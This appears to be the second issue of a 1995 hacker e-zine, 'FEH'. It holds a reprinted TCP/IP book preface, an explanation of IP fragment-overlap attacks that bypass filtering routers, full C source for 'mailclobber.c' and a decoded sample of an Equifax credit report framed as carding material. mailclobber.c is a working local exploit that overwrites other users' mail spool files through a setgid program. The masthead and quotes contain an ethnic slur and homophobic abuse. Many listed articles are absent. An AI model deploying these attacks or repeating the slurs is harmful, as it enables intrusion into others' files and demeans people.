/IIIIIIIIII /IIIIIIIII /III /III \ III_____/ \ III____/ \ III \ III \ III \ III \ III \_III \ IIIIIIII \ IIIIIIIII \ IIIIIIIIII \ III___/ \ III____/ \ III__/ III \ III \ III \ III \ III \ III ___ \ IIIIIIIII ___ \ III \ III ___ \__/ /\__\ \/________/ /\__\ \/__/ \/__/ /\__\ \/__/ \/__/ \/__/ RIENDLY LITE ACKERS Issue #2 September 24th, 1995 Editor: ReDragon Official FEH Con Organizer: Okinawa Official FEH Warez Supplier: Olphart Official FEH Distribution: Dark Tangent Official FEH Texan: Loq Official FEH Retro Gaming Editor: Hotrod Official FEH Cheese Supplier: NickO Official FEH Ethics Editor: X Official FEH Logs Supplier: Tele Monster Official FEH Messages Editor: negro Official FEH Stolen Handle Acronymn: TK - Tobias Knight Official FEH Mail Bomber: Unabomber Official FEH Skillz Supplier: Oof Official FEH Former Vox Employee: Wozz Official FEH 'Cusan: Cforbin Official FEH Spic: B Official FEH Caver: Junkman Official FEH Sport: Football Official FEH Alcoholic Drink: Goldschlager Official FEH Beer: Rogue's Dead Guy Ale Official FEH E-Mail Address: feh@pussy.org Official FEH Operating System: FreeBSD Official FEH microkernel OS: QNX Official FEH language: Ada Official FEH magazine to rip-off: B0W Official FEH group to rip-off: l0ck Official FEH Vehicle: 1967 Cadillac El Dorado Convertible Official FEH of Song: Midnight Star Greetz To Da Eleetz: albatross, armitage, artimage, bl0ke, bluesman, b0b, clovis, crax, deker, discodan, drunkfux, earle, etrigan, fuz, gfm, gheap, ghornet, Hod, hosaka, juliet, kc, kewp, krosis, lgas, malice, meowmix, morph, negro, novocain, opii, sevenup, shoo, swinder, tek, tele/phone, tewph, tobias knight, tsoul, twi, x0x, Y. Another One? For a while, it seemed that the first issue might also be the last; there was a wide range of opinion from the first ranging from "it sucked" to "this was the best you could come up with?". For a while we were thinking of putting out a totally serious issue, but that just didn't seem like too much fun; so then we pretty much let FEH die. But, due to a couple of events that happened recently, there was a renewed interest in putting out a second FEH. And so, here it is. This is not intended to make you laugh and think and teach you anything; it is here to entertain you, and if it does any of the three, it has succeeded. Keep an open mind, and a smile on your face. And so, without further adieu, I present to you, FEH #2. -ReDragon <----------------------------------------------------------------------------> Table of Contents: General Stuff Intro Table of Contents /var/spool/mail/feh Technical Articles: Fast TCP/IP Introduction by ReDragon IP Fragmenting by Anon Mail Clobber by gheap Acrofile Plus by Morph Hacker Light Show by Tele Monster Entertaining Articles: Hackers Review by Juliet Eleetness of Garage Sales by x0x Installing Sendmail by foo Pumpcon IV Info by Okinawa Pizza Hut Hacking by HoD Weird Al Logs by john0 Why Someone is lame by SnoCrash Hacking a Light Switch by Dhate Eleetness of AOL hackers by Minuteman How to Be Eleet by b0b How to Destroy Pac-Man by Hotrod Urination, A Poem by y Serious Commentary: Trust Among Hackers by ReDragon GUI mentality by Krosis & ReDragon The Evil GUI by Krosis The Unabomber Manifesto by FC <----------------------------------------------------------------------------> An Extremely Fast Introduction to TCP/IP by ReDragon Originally, I was planning on providing a big article explaining the inner workings of the TCP/IP protocols. To that end, I thought about where all of my knowledge concerning this largely arises from. Given that, if I was to explain everything I KNOW about TCP/IP, it would still largely be a subset of the original reference from which I learned about it, and thus it would be a waste of time for me to provide you a brief summary on the topic when you, a hacker, are interested in the long and exciting details. It is for that reason that instead of providing you with an incomplete treatment of the topic, I will instead point you to the resource from which I MOST HIGHLY recommend you purchase or borrow from your local college library, and from which my TCP/IP knowledge originated. You should be able to find it in a major book store, but any book store will order it for you if you ask. The preface to the book follows the vital info. TCP/IP Illustrated Volume 1: The Protocols by W. Richard Stevens ISBN: 0-201-63346-9 Copyright (c) 1994 by Addison-Wesley Publishing Company, All rights reserved. TCP/IP Illustrated Preface ___________________________________________________________ Introduction This book describes the TCP/IP protocol suite, but from a different perspective than other texts on TCP/IP. Instead of just describing the protocols and what they do, we'll use a popular diagnostic tool to watch the protocols in action. Seeing how the proto- cols operate in varying circumstances provides a greater understanding of how they work and why certain design decisions were made. It also provides a look into the implementation of the protocols, without hav- ing to wade through thousands of lines of source code. When networking protocols were being developed in the 1960s through the 1980s, expensive, dedicated hardware was required to see the packets going "across the wire." Extreme familiarity with the protocols was also required to comprehend the packets displayed by the hardware. Functionality of the hardware analyzers was limited to that built in by the hardware design- ers. Today this has changed dramatically with the ability of the ubiquitous workstation to monitor a local area network [Mogul 1990]. Just attach a workstation to your network, run some publicly available software (described in Appendix A), and watch what goes by on the wire. While many people consider this a tool to be used for diagnosing network problems, it is also a powerful tool for understanding how the network proto- cols operate, which is the goal of this book. This book is intended for anyone wishing to under- stand how the TCP/IP protocols operate: programmers writing network applications, system administrators responsible for maintaining computer systems and net- works utilizing TCP/IP, and users who deal with TCP/IP applications on a daily basis. Organization of the Book The following figure shows the various protocols and applications that are covered. The italic number by each box indicates the chapter in which that protocol or application is described. (Numerous fine points are missing from this figure that will be discussed in the appropriate chapter. For example, both the DNS and RPC use TCP, which we don't show.) We take a bottom-up approach to the TCP/IP protocol suite. After providing a basic introduction to TCP/IP in Chapter 1, we will start at the link layer in Chap- ter 2 and work our way up the protocol stack. This provides the required background for later chapters for readers who aren't familiar with TCP/IP or net- working in general. This book also uses a functional approach instead of following a strict bottom-to-top order. For example, Chapter 3 describes the IP layer and the IP header. But there are numerous fields in the IP header that are best described in the context of an application that uses or is affected by a particular field. Frag- mentation, for example, is best understood in terms of UDP (Chapter 11), the protocol often affected by it. The time-to-live field is fully described when we look at the Traceroute program in Chapter 8, because this field is the basis for the operation of the program. Similarly, many features of ICMP are described in the later chapters, in terms of how a particular ICMP mes- sage is used by a protocol or an application. We also don't want to save all the good stuff until the end, so we describe TCP/IP applications as soon as we have the foundation to understand them. Ping and Traceroute are described after IP and ICMP have been discussed. The applications built on UDP (multicast- ing, the DNS, TFTP, and BOOTP) are described after UDP has been examined. The TCP applications, however, along with network management, must be saved until the end, after we've thoroughly described TCP. This text focuses on how these applications use the TCP/IP pro- tocols. We do not provide all the details on running these applications. Readers This book is self-contained and assumes no specific knowledge of networking or TCP/IP. Numerous refer- ences are provided for readers interested in addi- tional details on specific topics. This book can be used in many ways. It can be used as a self-study reference and covered from start to finish by someone interested in all the details on the TCP/IP protocol suite. Readers with some TCP/IP back- ground might want to skip ahead and start with Chap- ter 7, and then focus on the specific chapters in which they're interested. Exercises are provided at the end of the chapters, and most solutions are in Appendix D. This is to maximize the usefulness of the text as a self-study reference. When used as part of a one- or two-semester course in computer networking, the focus should be on IP (Chapters 3 and 9), UDP (Chapter 11), and TCP (Chap- ters 17-24), along with some of the application chap- ters. Many forward and backward references are provided throughout the text, along with a thorough index, to allow individual chapters to be studied by themselves. A list of all the acronyms used throughout the text, along with the compound term for the acronym, appears on the inside back covers. If you have access to a network you are encouraged to obtain the software used in this book (Appendix F) and experiment on your own. Hands-on experimentation with the protocols will provide the greatest knowledge (and make it more fun). Systems Used for Testing Every example in the book was run on an actual network and the resulting output saved in a file for inclusion in the text. Figure 1.11 (p. 18) shows a diagram of the different hosts, routers, and networks that are used. (This figure is also duplicated on the inside front cover for easy reference while reading the book.) This collection of networks is simple enough that the topology doesn't confuse the examples, and with four systems acting as routers, we can see the error messages generated by routers. Most of the systems have a name that indicates the type of software being used: bsdi, svr4, sun, solaris, aix, slip, and so on. In this way we can identify the type of software that we're dealing with by looking at the system name in the printed output. A wide range of different operating systems and TCP/IP implementations are used: + BSD/386 Version 1.0 from Berkeley Software Design, Inc., on the hosts named bsdi and slip. This sys- tem is derived from the BSD Networking Software, Release 2.0. (We show the lineage of the various BSD releases in Figure 1.10 on p. 17.) + Unix System V/386 Release 4.0 Version 2.0 from U.H. Corporation, on the host named svr4. This is vanilla SVR4 and contains the standard implementa- tion of TCP/IP from Lachman Associates used with most versions of SVR4. + SunOS 4.1.3 from Sun Microsystems, on the host named sun. The SunOS 4.1.x systems are probably the most widely used TCP/IP implementations. The TCP/IP code is derived from 4.2BSD and 4.3BSD. + Solaris 2.2 from Sun Microsystems, on the host named solaris. The Solaris 2.x systems have a different implementation of TCP/IP from the ear- lier SunOS 4.1.x systems, and from SVR4. (This operating system is really SunOS 5.2, but is com- monly called Solaris 2.2.) + AIX 3.2.2 from IBM on the host named aix. The TCP/IP implementation is based on the 4.3BSD Reno release. + 4.4BSD from the Computer Systems Research Group at the University of California at Berkeley, on the host vangogh.cs.berkeley.edu. This system has the latest release of TCP/IP from Berkeley. (This system isn't shown in the figure on the inside front cover, but is reachable across the Inter- net.) Although these are all Unix systems, TCP/IP is operat- ing system independent, and is available on almost every popular non-Unix system. Most of this text also applies to these non-Unix implementations, although some programs (such as Traceroute) may not be provided on all systems. This book is the result of my being asked lots of questions on TCP/IP for which I could find no quick, immediate answer. It was then that I realized that the easiest way to obtain the answers was to run small tests, forcing certain conditions to occur, and just watch what happens. I thank Pete Haverlock for asking the probing questions and Van Jacobson for providing so much of the publicly available software that is used in this book to answer the questions. Tucson, Arizona W. Richard Stevens October 1993 rstevens@noao.edu <----------------------------------------------------------------------------> IP Fragmentation and the Security Risks therein By someone who doesn't want to lose his nice job Recently, there was some furor on the firewalls mailing list regarding possible security holes because of IP fragmentation. Of course, many people had asked about the possibility of such holes in the past, but in true Internet fashion, were met with replies of "No dummy, it works how it is supposed to." These are the same security experts that would have told you 8 years ago that passwords were not a necessity. I'll get my jab in by saying that I have thought this a problem since I first learned what IP was. CERT came out with an advisory and Cisco provided upgrades. Of course, in true CERT fashion, they let the cat out of the bag before letting other vendors get their versions patched. (Note that this is sarcasm and in fact, I would be surprised if CERT releases the SM 8.6.12 holes before next Christmas). The result of all this was much confusion among the firewall community, most of whom are still wondering how to "pRoTeCKT MeYE CaR FrUM Nf0-HiGHWeigH BanDiTZ". To understand this, the reader should know a little bit about IP. In short, IP is a way of sending information between computers on the Internet primarily. It splits data into packets, each of which has a header which tells the intermediate routers where to send it. Firewalls depend on this fact by allowing or blocking packets based on different fields in the header. Here's a diagram of an IP packet: 0_______3_______7_______11_______15_______19_______23_______27_______31 |version| length| Type Of Service | Total length (with data) | |---------------------------------|-----------------------------------| | packet ID |flags| Fragment Offset | |---------------------------------|-----------------------------------| | TTL | Protocol | Checksum of Header | |---------------------------------|-----------------------------------| | Source IP address | |---------------------------------------------------------------------| | Destination IP address | |_____________________________________________________________________| Most of these headers are of no consequence to routers. They just look at the destination IP address and apply it to their routing table and forward the packet to the next router. Filtering routers are different. They look at more fields in the header and allow or deny packets based on a set of rules. For instance, a site that wished to keep anyone from accessing its NFS server (smart idea!) would set their router as such: Deny packets from to on UDP port 2049 Programs use "ports" to distinguish what service should receive data. Port 2049 is for the Network File Server protocol. It uses UDP on top of IP. Other connections can be made using TCP on top of IP. Whichever the case, the router looks at a packet and if it has 2049 as the destination port, drops it. If not, it forwards the packet to its destination. Interfaces (Ethernet, SLIP, etc) can only transmit packets of a certain size. For ethernet, it's 1500 bytes. This is called the MTU (Maximum Transmit Unit). Packets larger than this are fragmented. This means that they are split into multiple, smaller size packets. The sending system breaks the data into smaller packets and then sends them to the destination host, which puts them back together in the order specified. The packets are sent like this: _________________________ ____________________ | IP hdr | UDP hdr | data | <-- | IP hdr | more data | ------------------------- -------------------- The destination host receives the packets, and noting that the fragmentation offset (see IP header above) is set, reassembles the packets. It uses the offset field in the IP header to put the packets together in the original order. For example, if you were sending a 1600 byte packet over an interface with an MTU of 1500, the following packets would be sent Packet 1: 20 byte IP header, 8 byte UDP header, 1472 bytes of data (frag set) Packet 2: 20 byte IP header, 128 bytes of data, frag offset of 1472 This causes the data in packet 2 to be appended to packet 1 at the destination host. Now comes the interesting part. Since reassembly only takes place at the destination host, how can we skirt a filtering router? The routers do know reassembly of fragmented packets, so let's think of a sequence of packets to take advantage of this. For our target network, let's say we have an FTP server behind the router. The router filters out all packets except those to FTP command (21) and FTP data (20). It is running NFS though. That makes it easy. What we'll do is send a packet to the ftp data port, but redirect it to NFS. Packet 1: Src- US Dst-target TCP port 20 (frags) Packet 2: Src- US Dst-target -frags- This is the trick: specify a fragmentation offset of 1 in the second packet. Suddenly, the data in packet 2 is being written over the TCP header of packet 1. So, what should the data of packet 2 be? How about a UDP header with a port of 2049? The data can be any valid NFS request, including unlink(). Note that you can only change the TCP or UDP header, not the IP header, since fragmentation is a function of IP. If this isn't clear enough, here's a step by step breakdown. 1. We send a set of packets to target that have the fragmentation field set. 2. The router only sees the TCP header in the first packet and passes it since it's to a valid port (20) 3. The target host reassembles the packets, but since we specified a value for the frag offset less than the end of the first packet, that packet is overwritten with our new header. 4. IP delivers the valid UDP packet on up the stacks 5. NFS gets the UDP packet and does whatever the operation. The best way to solve this problem is to have the reassembly algorithm only allow offsets greater than or equal to the end of the previous packet. I am pretty sure the interim measure provided by Cisco just reassembles fragments at the router and checks the ports. This is bad in that the RFC's say that reassembly should only be done at the destination host. Hopefully other router manufacturers will develop patches soon. <----------------------------------------------------------------------------> mailclobber.c by gheap Mailclobber takes advantage of filter(1L), which is setgid mail. It does no checking to see what kind of file it is opening up when it fopen()'s a temp file. This allows a crafty user to overwrite other users mail spool files, due to users having their spool files writable by the mail group. There is also a problem with the logging mechanism not caring where it writes to. This allows you to create a file that you can write to in /var/spool/mail. Please note that this problem has only been noticed on CERTAIN Linux systems where there are group write permissions on /var/spool/mail. gheap Written 08/25/95 Released 09/01/95 2621 "One Drink please!" #include #include #define FILTERRULE "if (to contains \"IHaQ4SeX@eyespy.nsa.gov\") then save \"wewin\"\n" #define MAILHEADER1 "From IHaQ4SeX@eyespy.nsa.gov Wed Aug 25 66:66:66 1965\n" #define MAILHEADER2 "Return-Path: IHaQ4SeX\n" #define MAILHEADER3 "Recieved: \(from IHaQ4SeX@eyespy.nsa.gov) by d0xmaster.BoW.net \(8.6.13/8.6.12) id X0D31337 for asshole; Wed, 25 Aug 1965 66:66:66 -0400\n" #define MAILHEADER4 "Date: Wed, 25 Aug 1965 66:66:66 -0400\n" #define MAILHEADER5 "From: IHaQ4SeX@eyespy.nsa.gov\n" #define MAILHEADER6 "Message-Id: <199508250666.X0D31337@eyespy.nsa.gov>\n" #define FILTERFIND "To: IHaQ4SeX@eyespy.nsa.gov\n" #define MAILHEADER7 "Subject: Bye Bye spool file chump.\n\n" #define EXECSTRING "cat /tmp/header | filter -f filter.r00l" void show_usage(char *progname) { fprintf(stderr,"%s /file/to/clobber /file/to/clobber/with\n",progname); exit(0); } void main(int argc, char *argv[]) { int x,t,c; char filter_temp_file[75]; FILE *fp,*fp2; if ((argc != 3)) { show_usage(argv[0]); } if ((access(argv[1],F_OK))!=0) { fprintf(stderr,"%s: You idiot, %s doesn't exist.\n I can't clobber what isn't there.\n",argv[0],argv[1]); fprintf(stderr,"SPECIAL NOTE: To create a file owned by you in /var/spool/mail,\n simply type the following command:\n \"cat /any/file/you/can/read|filter -vo /var/spool/mail/filterisdumb\"\n"); exit(0); } if ((access(argv[2],F_OK))!=0) { fprintf(stderr,"%s: You idiot, %s doesn't exist.\n What do you expect me to do, speak for you?\nI oughta clobber you\n",argv[0],argv[2]); exit(0); } x=getpid(); if ((fp=(fopen("/tmp/filter.r00l","wt")))==NULL) { fprintf(stderr,"%s: cant write to /tmp/filter.r00l\n",argv[0]); exit(0); } fprintf(fp,FILTERRULE); fclose(fp); if ((fp=(fopen("/tmp/header","wt")))==NULL) { fprintf(stderr,"%s: cant write to /tmp/header\n",argv[0]); exit(0); } fprintf(fp,MAILHEADER1); fprintf(fp,MAILHEADER2); fprintf(fp,MAILHEADER3); fprintf(fp,MAILHEADER4); fprintf(fp,MAILHEADER5); fprintf(fp,MAILHEADER6); fprintf(fp,FILTERFIND); fprintf(fp,MAILHEADER7); fclose(fp); if ((fp=(fopen(argv[2],"rt")))==NULL) { fprintf(stderr,"%s: cant read %s, what gives?",argv[0],argv[2]); exit(0); } if ((fp2=(fopen("/tmp/header","at")))==NULL) { fprintf(stderr,"%s: cant write to /tmp/header\n",argv[0]); exit(0); } while ((t=getc(fp))!=EOF) { fputc(t,fp2); } fprintf(fp2,"\r\n"); fclose(fp); fclose(fp2); sprintf(filter_temp_file,"/tmp/filter.%d",x+3); if (symlink(argv[1],filter_temp_file)!=0) fprintf(stderr,"%s: Couldnt make the link, man...\n",argv[0]); system(EXECSTRING); unlink("/tmp/header"); unlink(filter_temp_file); unlink("wewin"); unlink("filter.r00l"); fprintf(stdout,"This program did not clean up %s, delete it yourself, wanker.\n",argv[2]); } <----------------------------------------------------------------------------> || || || || || || fUNKY sTREET rEMIX v1.5 \\\\\\\\// tHA dIRTY vERSION wH00T!%@! || || ==||=||==========================| NoCo |==============================||=||== || || Morph of CAFBL Presents 0 0 Acrofile Plus From Equifax || || ==||=||===========================\ /===============================||=||== || || Pleeze courie this ware - (O O) - Pleeze courie me goddamnit. || || || || ~~~~\ || || || | (C) Morpheus and Equifax All Rights Reserved? wh00t! | || || || | Moo. Moo. Moo. (Moo.) | Presenting Another Hands_Phree(r) Text File!@$# Registered FEH Version! Way K0ol! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ it's so cool i think i'll just put a 0 in there so it's k0ol. wh00t#@! Morph commin back at ya wiff 0-day kardin' k0d3z#!@ wh00t#@! Dis mo'fo krad text bout how to d00dle a decent ansi wiff thedraw registerd 6 wuz brought tew you by morph (d4t's m3#@$!) and FEH wh00t$!@ ============================================================================== Wh0rd H3r3 4r3 D4h M3g3l33t Gr33tz n StuFf L1k3 D4t h0m13z$@#! wh00t#@$!^# ============================================================================== Dark Phiber - Thanks phor starting CAFBL cause like we need MORE skary rollerbladers. Kaos - wh00t noc0. Arkane - Ur new handle sucks more den the corn in kaos's mom's shit. Amity - You are far beyond leet. Optic - Dood eye need to know where you buy Ur Crack because eye will shop there from now on. Spiff - G0OD LUCK AT COLLGe. Mogel - Ur textphiles suck or whatever%&#*%#!^!@ Crank - don't forget it girlie. CAFBL Chickz - Crisco Twister at Spookie's house Tonite$@^#! Emmanuel - Elastica rewlz$#! SeE U At ColLege. Various #zines People - Fuq^$#!@$@ Various dto writers - k0d3$@! --> 1-800-925-9999 ##529!$@^% Buy some PHREE_MUMIA(C) T-Shirts today! ============================================================================== ===================Stupid Muthafuckin Quotes And Shit Like Dat================ ============================================================================== " dood don't hack checkpoint.wood.com it's just a bunch of firewalls. " - Eagle_1 August 1995 gweeds, no u have yet to show anything but an ability to talk bullshit it's in hexadecimal j00hed. d00d man u r still nuphn but a leadpaint guzzlin retard d00dle boy. gWeeDz kant even read phrack u dont gnow whut it feelz lyke to getcher head smooshed in by a krikkit bat u43a c0rp, but u know what it feels like to have a dick up ur ass and in ur m0uth.. FUQ. if only i'd da cash ta move up ta Sn0w-J00 land n let da arctic lameness take effect. - l0ck vs. u4ea August 1995 " Hi mother fucker, how'd you like the demo? lamer!!!! " - GRYM issue 1 " Should I have included plans to build a bomb out of a taco? " - HoE issue 87 " I'd also Like to add that I'm Dumb. " - Erik B. August 1995 "...so i'm living at this payphone at least for now." - Amity August 95 ============================================================================== ==================End Of Anything Vaguely Interesting========================= ============================================================================== ==Turn Tha Lights Down and Kick Ur Little Brother Out! Here Comes the Codes!== ============================================================================== ====================== Acrofile Plus Overview ====================== Like d00d it's Wh4t d3y s3nd y3w Wh3n y3w PuLl a Kr3d1t R3p0rt FrUm EqU1f4x 0r Cb1 0r Wh4t3v3r#@! y0r M4m4$#@!^%@$#(*&@! FuQ Y0u L4m3r G33k4z01d#^$!*&%$#@! d00D 3y3 W1ll Br3aK Ur F1nG3rZ Y0U P0tTy R4nG3r*%^#^#!@%&!$ WhY Y0u. . . P0tTy R4nG3r P0TtY R4NG3r P0tT-T34 R4NnNg3r&!%&#!$ GrRRRrrRRRRrrr. . . 0k4y 0K4y c4lM d0wN. ============================== Acrofile Plus Fax Explained ============================== Basically what an acrofile plus is a credit report. Just like you could get from anywhere else. This format is used with equifax and cbi, which is an affiliate of equifax, and so on. Getting an acrofile is a whole different story, and is not for you mere mortals to know. bahhahaha. wh00t@#!^%!$@@#(*^!@ Basically the below document is a copy of what is distributed to equifax employees and employees of affiliated agencys to help them better understand the acrofile format. If you personally want a copy of this document sent to your house (Y34h b0Y!#@) please fell free to write to: Equifax Credit Information Services 5505 Peachtree Dunwoody RD STE 600 Atlanta GA 30302 Or you can even call 1-800-685-1111 and request a copy sent to you asap and remember to tell them that you deserve access to all general information as a citizen of the United States and as a Human Being. With that in mind, let's move on to figure 2. (fig 2.) ============================================================================== Figure Two (fig 2.) A Look At An Acrofile Plus Report ============================================================================== ============================================================================== * 001 Equifax Credit Information Services - P O BOX 740241 5505 Peachtree Dunwoody Rd STE 600 Atlanta GA 30374-0241 404/612-2565 * CONSUMER,JOHN,Q,JR,JANE SINCE 03/10/73 FAD 04/22/93 FN-232 9412,PEACHTREE,ST,ATLANTA,GA,30302,TAPE RPTD 07/87 410,ORANGE GROVE,DR,SAN JOSE,CA,95119,CRT PRTD 06/85 46,KENNEDY,DR,DETROIT,MI,DAT RPDT 01/80 ****ALSO KNOWN AS CONSUMER, ROBERT**** BDS-03/03/49,SSS-900-00-0000 01 ES-ENGINEER,LOCKHEED,ATLANTA,GA,EMP 06/87,VER 03/92 02 EF-ENGINEER,CENTRAL POWER,SAN JOSE,CA,,,,LEFT 05/87 03 E2-ENGINEER,GENERAL MOTORS,DETROIT,MI,,,,LEFT 05/85 *SUM-04/73-04/93,PR/OI-YES,COLL-YES,FB-NO,ACCTS:10,HC$450-87595, 6-ONES,1-TWO 1-THREE, 1-FIVE, 1-OTHER, HIST DEL- 1-TWO, 2-THREES, 1-FOUR. INQUIRY ALERT - SUBJECT SHOWS 4 INQUIRIES SINCE 01/93 ******* PUBLIC RECORDS OR OTHER INFORMATION ******** 04 07/87 BKRPT 111VF116, 453657,LIAB$25600,ASSET$10500, EXEMPT$100, INDIVID, PERSONAL,VOL CH-7 05 05/89 ST JD,111VC51, $500,DEF-SUBJECT,88776,VISA,VER 06/89 SATISFIED, 06/89 **************************************************** ****** COLLECTION ITEMS ****** LIST RPTD AMT/BAL DLA/ECOA AGENCY/CLIENT STATUS/SERIAL 04/92 11/92 $532 11/92 111YC363 ACB COL PAYMENT $300 I DR JONES 202012 ****************************** FIRM / IDENT CODE CS RPTD LIMIT HICR BAL $ DLA MR (30-60-90+)M/D ECOA / ACCT NUMBER OPND P/DUE TERM 24 MONTH HISTORY ----------------------------------------------------------------------- ATL FIN VS*111FS26 R5 04/93 3000 --- 2632 12/92 61 (01-01-01) I/ 4453 03/88 700 140 432*******/****** ACCOUNT CLOSED BY CREDIT GRANTOR PROV BK MD*111ON192 R1 04/93 500 --- 440 04/93 34 J/86934 02/84 --- 25 WATCH IL *11BB771 R1 04/93 5000 --- 4500 I/432704567 07/88 --- 100 LORD & TAY*111DC151 R3 03/93 --- 478 356 01/93 42 (04-02-00) J/175 09/89 50 25 2***232*****/****** RICH'S *111DC24 R1 02/93 615 --- 0 01/93 10/73 25 --- REVOLVING TOTALS 9500 1093 8238 750 300 ---------------------------------------------------------------------------- AMEXTRVLSV*111ON259 01 04/93 --- 450 123 04/93 27 J/ 01/91 --- 123 OPEN TOTALS --- 450 123 --- 123 ---------------------------------------------------------------------------- HFC *11FP439 I1 03/92 --- 4200 123 04/93 27 C/12566843 01/91 --- 18M PAINE/WEBB*111FM1117 I2 02/93 --- 8753 37543 12/92 67 (01-00-00) I/7785632 07/87 750 HOMO LOAN INSTALLMENT TOTALS ---- 9175 38278 750 750 ---------------------------------------------------------------------------- GRAND TOTALS 9500 93358 46658 1500 1173 ---------------------------------------------------------------------------- WACH IL 111BB771 08/92 --- --- --- 08/89 4567 07/88 LOST OR STOLEN WAREZ *INQS-BURDINES 111DC304 04/22/93 HECHT CO 111DC2872 03/15/93 FREIDMAN'S 111JA105 02/12/93 BARNETTBNK 111FM6875 01/31/93 BEN COLL 111FF947 12/14/92 FK 111YC00058 12/14/92 & END OF REPORT EQUIFAX AND AFFILIATES - 04/22/93 SAFESCANNED ============================================================================== ============================================================================== Figure Three (fig 4.) How to Courie the Warez or What does it all Mean?!@#? ============================================================================== * 001 Equifax Credit Information Services - P O BOX 740241 5505 Peachtree Dunwoody Rd STE 600 Atlanta GA 30374-0241 404/612-2565 - Consumer Referral Message: This is IN FACT the address and phone number of the reporting bureau. It is provided to assist you and the consumer in the event of adverse action. * CONSUMER,JOHN,Q,JR,JANE SINCE 03/10/73 FAD 04/22/93 FN-232 9412,PEACHTREE,ST,ATLANTA,GA,30302,TAPE RPTD 07/87 410,ORANGE GROVE,DR,SAN JOSE,CA,95119,CRT PRTD 06/85 46,KENNEDY,DR,DETROIT,MI,DAT RPDT 01/80 ****ALSO KNOWN AS CONSUMER, ROBERT**** BDS-03/03/49,SSS-900-00-0000 - Identification: Subject and Spouse name, current address, origin and date added to the file, former addresses, also know as, sex, marital status, age, number of dependents, dob, ss subject SINCE 03/10/73 FAD 04/22/93 FN-232 - File Activity: since = date last file was established, fad = last activity on file, fn = file number (for equifax internal use) 01 ES-ENGINEER,LOCKHEED,ATLANTA,GA,EMP 06/87,VER 03/92 02 EF-ENGINEER,CENTRAL POWER,SAN JOSE,CA,,,,LEFT 05/87 03 E2-ENGINEER,GENERAL MOTORS,DETROIT,MI,,,,LEFT 05/85 - Employment: ES-(employment subject) position, firm, location, date hired, date verified, monthly salary EF-(employment former) position, firm, loc, date left E2-(employment former second) *SUM-04/73-04/93,PR/OI-YES,COLL-YES,FB-NO,ACCTS:10,HC$450-87595, 6-ONES,1-TWO 1-THREE, 1-FIVE, 1-OTHER, HIST DEL- 1-TWO, 2-THREES, 1-FOUR. - Summary of File Items: 04/73 = oldest opening date of trade 04/93 = newest reporting date of trade PR/OI = does file have public records (yes) COLL = does file have collection items (yes) FB = does file contain info from credit rep companies not affiliated with equifax (no) ACCTS = how many tradelines HC = high credit (range $460-87,595) 6-ONES = five trades in file CS 1 1-TWO = one trade in file CS 2 1-THREE = one trade in file CS 3 1-FIVE = one trade in file CS 5 1-OTHER = one trade with no CS HIST DEL = historical deliquency which shows the number of tradelines with the highest deliquency ratings in either max/del or 24 mos history. INQUIRY ALERT - SUBJECT SHOWS 4 INQUIRIES SINCE 01/93 - Inquiry Alert: alert appears if subject shows three or more inquiries in the past 90 days. ******* PUBLIC RECORDS OR OTHER INFORMATION ******** 04 07/87 BKRPT 111VF116, 453657,LIAB$25600,ASSET$10500, EXEMPT$100, INDIVID, PERSONAL,VOL CH-7 05 05/89 ST JD,111VC51, $500,DEF-SUBJECT,88776,VISA,VER 06/89 SATISFIED, 06/89 **************************************************** - Public Records Or Other Information: BKRPT (Bankruptcy) date filed, court number, case number, liabilities, assets, exempt amount, filer, type, intent STJD (Satisfied Judgement) date filed, court number, amount, defendant, case number, plantiff, date verified, status, date satisfied ****** COLLECTION ITEMS ****** LIST RPTD AMT/BAL DLA/ECOA AGENCY/CLIENT STATUS/SERIAL 04/92 11/92 $532 11/92 111YC363 ACB COL PAYMENT $300 I DR JONES 202012 - Collection Items: LIST - date assigned to collection agency RPTD - date reported AMT - total amount of collection BAL - balance as of date recorded ECOA - equal credit opprotunity act designator DLA - date of last activity AGENCY - collection agency member number CLIENT - customer the agency represents STATUS - last activity reported SERIAL - account serial number FIRM / IDENT CODE CS RPTD LIMIT HICR BAL $ DLA MR (30-60-90+)M/D - Trade: First Line: Firm / Ident Code-Name and number of reporting company *-trade information for automated tape suppliers Type Of Account R = revolving acct O = open acct I = installment acct CS-Current Status Of Account 0 - Too New to Rate; Approval But Not Used 1 - As Agreed; Not More Than 1 Payment Past Due 2 - Pays 31-60 Days; Not More Than 2 Payments Past Due 3 - Pays 61-90 Days; Not More Than 3 Payments Past Due 4 - Pays 91-120 Days; Not More Than 4 Payments Past Due 5 - Pays Over 120 Days; 5 or more Payments Past Due 7 - Making Regular Payments Under Paid Under Wage Earner or Similar Arrangement 8 - Repossessed Shit 9 - Charged Off to Yo Mama's Bad Credit RPTD - date account was reported LIMIT - credit limit HICR - high credit BAL$ - balance owned as of reporting date DLA - date of last activity on account MR - months reviewed MAX/DEL - most recent highest delinquency beyond the 24th month ECOA / ACCT NUMBER OPND P/DUE TERM 24 MONTH HISTORY - Second Line: ECOA K0D3Z U - Undesignated I - Individual A - Authorized User J - Joint C - Co-Maker B - On Behalf Of M - Maker T - Association with Account Terminated S - Shared Warez Account Number: OPND - Date Account was Opened With Reporting Company P/D - Past Due Amount TERM - Monthly Payment Amount 24 Month History: Rate history 24 months prior to current status, slash (/) seperates two 12 mos periods. (r34d Fr0m L3ft t0 r1t3 0nl33!) * = no delinquency this month - Note: Accounts are grouped by revolving, open, and installment. Whithin those groups, trades are sorted by the most recent date reported. Totals are calculated for limit, High Credit, balance, past due, and terms within each group. - Grand Totals: Grand Total for Limit, High Credit, Balance, and Past Due WACH IL 111BB771 08/92 --- --- --- 08/89 4567 07/88 - Other: accounts not reflecting rating type (revolving, open, installments) *INQS-BURDINES 111DC304 04/22/93 HECHT CO 111DC2872 03/15/93 FREIDMAN'S 111JA105 02/12/93 BARNETTBNK 111FM6875 01/31/93 BEN COLL 111FF947 12/14/92 FK 111YC00058 12/14/92 - Inquiries: Member name, number, and date inquired. Two year history as shown above. END OF REPORT EQUIFAX AND AFFILIATES - 04/22/93 SAFESCANNED - Safescanned: This file was accessed by a customer using the equifax save as acrofile option. Plus date file was accessed. ============================================================================== Figure Eight (fig 8.) Conclusion and Bonus Warez [bUszt4 m0v3 P01nD3xt3r!] ============================================================================== ============================================================================== ... 4wWw Y34h s0m3 l33tsp34k g03z 0uT t0 m4h h0m13z 4nD 4wWwWw y34h!#@ 4sCiI PiGg13s@$#! ______ 6/ ^..^ / gmac supertramp on craq, wooah. (moo) @ @ @ @ @ \ ___ (oo) @ @ @ @ @ @ @ @<-D41yZyz \|/ \|/ \|/ \|/ 